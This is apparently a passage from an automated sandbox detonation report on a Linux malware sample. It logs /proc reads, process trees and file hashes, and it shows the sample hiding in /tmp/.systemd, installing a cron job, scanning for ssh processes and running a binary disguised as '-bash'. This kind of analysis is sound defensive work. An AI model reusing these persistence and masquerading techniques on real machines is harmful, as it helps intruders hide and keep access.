| File opened for reading | /sys/devices/system/cpu/online | /bin/ps | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/79/status | /bin/ps | N/A |
| File opened for reading | /proc/sys/kernel/osrelease | /bin/ps | N/A |
| File opened for reading | /proc/317/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/167/stat | /bin/ps | N/A |
| File opened for reading | /proc/729/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/732/stat | /bin/ps | N/A |
| File opened for reading | /proc/9/status | /bin/ps | N/A |
| File opened for reading | /proc/150/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/24/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/722/stat | /bin/ps | N/A |
| File opened for reading | /proc/2/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/24/stat | /bin/ps | N/A |
| File opened for reading | /proc/15/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/22/stat | /bin/ps | N/A |
| File opened for reading | /proc/82/status | /bin/ps | N/A |
| File opened for reading | /proc/345/stat | /bin/ps | N/A |
| File opened for reading | /proc/9/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/13/status | /bin/ps | N/A |
| File opened for reading | /proc/376/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/14/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/79/status | /bin/ps | N/A |
| File opened for reading | /proc/732/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/318/status | /bin/ps | N/A |
| File opened for reading | /proc/66/status | /bin/ps | N/A |
| File opened for reading | /proc/368/stat | /bin/ps | N/A |
| File opened for reading | /proc/105/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/70/status | /bin/ps | N/A |
| File opened for reading | /proc/230/stat | /bin/ps | N/A |
| File opened for reading | /proc/727/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/14/status | /bin/ps | N/A |
| File opened for reading | /proc/19/status | /bin/ps | N/A |
| File opened for reading | /proc/68/status | /bin/ps | N/A |
| File opened for reading | /proc/9/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/741/status | /bin/ps | N/A |
| File opened for reading | /proc/filesystems | /bin/ps | N/A |
| File opened for reading | /proc/105/stat | /bin/ps | N/A |
| File opened for reading | /proc/736/status | /bin/ps | N/A |
| File opened for reading | /proc/12/status | /bin/ps | N/A |
| File opened for reading | /proc/115/stat | /bin/ps | N/A |
| File opened for reading | /proc/76/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/138/status | /bin/ps | N/A |
| File opened for reading | /proc/15/status | /bin/ps | N/A |
| File opened for reading | /proc/21/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/36/stat | /bin/ps | N/A |
| File opened for reading | /proc/740/status | /bin/ps | N/A |
| File opened for reading | /proc/78/stat | /bin/ps | N/A |
| File opened for reading | /proc/657/stat | /bin/ps | N/A |
| File opened for reading | /proc/115/stat | /bin/ps | N/A |
| File opened for reading | /proc/698/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/716/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/11/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/6/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/awk | N/A |
| File opened for reading | /proc/3/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/669/status | /bin/ps | N/A |
| File opened for reading | /proc/660/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/76/stat | /bin/ps | N/A |
| File opened for reading | /proc/36/stat | /bin/ps | N/A |
| File opened for reading | /proc/78/status | /bin/ps | N/A |
| File opened for reading | /proc/138/status | /bin/ps | N/A |
| File opened for reading | /proc/376/stat | /bin/ps | N/A |
| File opened for reading | /proc/16/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/filesystems | /bin/cp | N/A |
| File opened for reading | /proc/7/status | /bin/ps | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/cp | N/A |
Processes
/tmp/.systemd/.run
[/tmp/.systemd/.run]
/bin/grep
[grep ssh ]
/bin/grep
[grep -v R]
/bin/ps
[ps x]
/bin/grep
[grep -v grep]
/usr/bin/awk
[awk {print $1}]
/bin/ps
[ps x]
/bin/grep
[grep ssh$]
/bin/grep
[grep -v R]
/bin/grep
[grep -v grep]
/usr/bin/awk
[awk {print $1}]
/bin/grep
[grep -v R]
/bin/grep
[grep -v grep]
/bin/grep
[grep sh$]
/usr/bin/awk
[awk {print $1}]
/bin/ps
[ps x]
/bin/uname
[uname -m]
/bin/cp
[cp -f -- .mips -bash]
/tmp/.systemd/-bash
[./-bash]
Network
Files
Analysis: behavioral8
Detonation Overview
Submitted
2024-11-08 11:36
Reported
2024-11-08 11:40
Platform
debian9-armhf-20240611-en
Max time kernel
1s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Creates/modifies Cron job
| Description | Indicator | Process | Target |
| File opened for modification | /var/spool/cron/crontabs/tmp.RBTJla | /usr/bin/crontab | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.systemd/systemd.dir | /tmp/.systemd/auto | N/A |
| File opened for modification | /tmp/.systemd/systemd.d | /tmp/.systemd/auto | N/A |
| File opened for modification | /tmp/.systemd/.systemd | /tmp/.systemd/auto | N/A |
Processes
/tmp/.systemd/auto
[/tmp/.systemd/auto]
/bin/uname
[uname -m]
/bin/cat
[cat systemd.dir]
/usr/bin/crontab
[crontab -l]
/bin/grep
[grep .systemd]
/usr/bin/wc
[wc -l]
/usr/bin/crontab
[crontab -l]
/usr/bin/crontab
[crontab systemd.d]
/bin/rm
[rm -rf systemd.d]
/bin/chmod
[chmod u+x .systemd]
Network
Files
/tmp/.systemd/systemd.dir
| MD5 | 1f3a48ead214b69a4e5bbcc12a732ddb |
| SHA1 | 3391a93f27a805c58de438e5a50267af13b619ab |
| SHA256 | 8ebe6ec5aee16e2d6ea3fe45a22e72ad8f936a83a7fc9e82591885bcb45e322c |
| SHA512 | 386b19da83f4b8416d17960a3c0832b38521a3396dbf99501dcf03811e17d1696b18db4131f66375889afc2c44d791dd62239a86d3ba0fa614b8547480a7381d |
/var/spool/cron/crontabs/tmp.RBTJla
| MD5 | dbb47228523c48edfe60dda1b012f03d |
| SHA1 | 64adf38fbd662f2cdc856b0a1a1898d60d2e5c14 |
| SHA256 | 0985d86b6a0b52111095135d4a0e5405848d42318445492d6540784bfc61f30e |
| SHA512 | a720fc83063c925b735443be41ae8857d342c1a6dd64afe3463b6c9c64c35e4725641d3db5dd5ce7f22fc965e77d5218fb0903c592c51c777992e59b9419a287 |
/tmp/.systemd/.systemd
| MD5 | 20abc8e72d4066c0565f7bbfad0fe526 |
| SHA1 | 10cb464b8e9401cb3bfe17e059c957d79f4a93dd |
| SHA256 | 579de93e6119bdd4eb948bbdc32b0a3340bab93d4d0b5db723dbc5dddf82b09b |
| SHA512 | 9d849197900f20993624e5b713b24c72ffd269b078a7fc8574211258899bc70ddc85f00259d5f6aa3b032bcc0ec687524f042b6fed5e4fa96781d03a858ac977 |